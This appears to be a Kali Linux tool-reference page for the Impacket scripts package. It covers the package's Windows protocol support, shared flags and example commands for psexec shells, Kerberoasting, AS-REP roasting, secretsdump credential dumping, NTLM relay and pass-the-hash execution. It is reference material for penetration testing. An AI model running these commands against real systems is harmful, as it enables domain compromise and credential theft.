Category: Post Exploitation. Tags: windows, active-directory, smb, kerberos, ntlm, rpc, ldap, exploitation, credential-access

Impacket Scripts

Collection of Python scripts from the Impacket library providing Windows protocol client implementations for SMB, MSRPC, Kerberos, and Active Directory operations.

Description

Impacket-scripts is a Kali Linux package containing symbolic links to useful Impacket scripts, separating them from the main Debian impacket package for easy access in the PATH. These scripts implement various Windows network protocols including SMB, MSRPC, Kerberos, LDAP, and more, enabling penetration testers to interact with Windows systems for enumeration, exploitation, and post-exploitation activities.

The package supports a wide range of operations such as NTLM authentication parsing, Group Policy password extraction, Active Directory enumeration, Kerberos ticket manipulation, remote command execution, service management, and privilege escalation techniques. Scripts target domain controllers, workstations, and servers across different protocols and authentication mechanisms.

Use cases include Active Directory reconnaissance (GetADUsers, GetADComputers), Kerberos attacks (GetUserSPNs for Kerberoasting, GetNPUsers for AS-REP roasting), SMB-based execution (psexec, smbexec), credential dumping (secretsdump), NTLM relay (ntlmrelayx), persistence via WMI event subscriptions (wmipersist), and delegation abuse such as resource-based constrained delegation (rbcd).

How It Works

Scripts implement Windows network protocols in pure Python: SMB for file and service operations, MSRPC/DCOM for remote execution, Kerberos for ticket-based authentication, LDAP for directory queries, and NTLM for challenge-response authentication. They accept several credential forms (plaintext passwords, NTLM hashes for pass-the-hash, Kerberos tickets from a ccache, and AES keys) and connect over the usual TCP ports (445/SMB, 135/RPC endpoint mapper plus dynamic RPC ports, 389/LDAP, 88/Kerberos). Many build on Impacket's protocol libraries to parse structures, forge packets, and relay authentication, which is what enables attacks such as Kerberoasting, AS-REP roasting, and NTLM relay.

Installation

```bash
sudo apt install impacket-scripts
```

Flags

These flags are shared by most of the scripts; each script also has its own options, so run `impacket-<script> -h` for the full list.

| Flag | Description |
|---|---|
| `-h`, `--help` | Show this help message and exit |
| `-debug` | Turn DEBUG output on |
| `-ts` | Add a timestamp to every logging output |
| `-hashes LMHASH:NTHASH` | NTLM hashes, format is LMHASH:NTHASH (the LM half may be left empty) |
| `-no-pass` | Don't ask for a password (useful with `-k`) |
| `-k` | Use Kerberos authentication; grabs credentials from the ccache file named by `KRB5CCNAME` |
| `-aesKey hex key` | AES key to use for Kerberos authentication (128 or 256 bits) |
| `-dc-ip ip address` | IP address of the domain controller |
| `-target-ip ip address` | IP address of the target machine |

Examples

Get an interactive SYSTEM shell via SMB on the target using plaintext credentials:

```bash
impacket-psexec domain/administrator:Password123@192.168.1.10
```

Kerberoast: request service tickets for all accounts with SPNs and dump them in an offline-crackable format:

```bash
impacket-GetUserSPNs domain.local/user:pass -dc-ip 192.168.1.1 -request
```

AS-REP roasting: for accounts with Kerberos pre-authentication disabled, request AS-REP messages whose encrypted part can be cracked offline (no domain credentials needed, only a list of candidate usernames):

```bash
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 192.168.1.1
```

Dump NTLM hashes, LSA secrets, and cached domain credentials from a Windows host:

```bash
impacket-secretsdump domain/admin:pass@192.168.1.10
```

NTLM relay: relay captured NTLM authentication to SMB on every host in the target list (only hosts without SMB signing enforced are exploitable):

```bash
impacket-ntlmrelayx -tf targets.txt -smb2support
```

Semi-interactive PowerShell execution over SMB (no binary is uploaded; commands run through a temporary service):

```bash
impacket-smbexec domain/user:pass@192.168.1.10 -shell-type powershell
```

Remote code execution via WMI using pass-the-hash. The `-hashes` value is `LMHASH:NTHASH`; the LM half can be left empty, and `NTHASH` is the account's NT hash as reported by secretsdump:

```bash
impacket-wmiexec domain/admin@192.168.1.10 -hashes :NTHASH
```

Enumerate all Active Directory user accounts and their attributes:

```bash
impacket-GetADUsers -all domain.local/user:pass -dc-ip 192.168.1.1
```
Updated 2026-04-16. Source: kali.org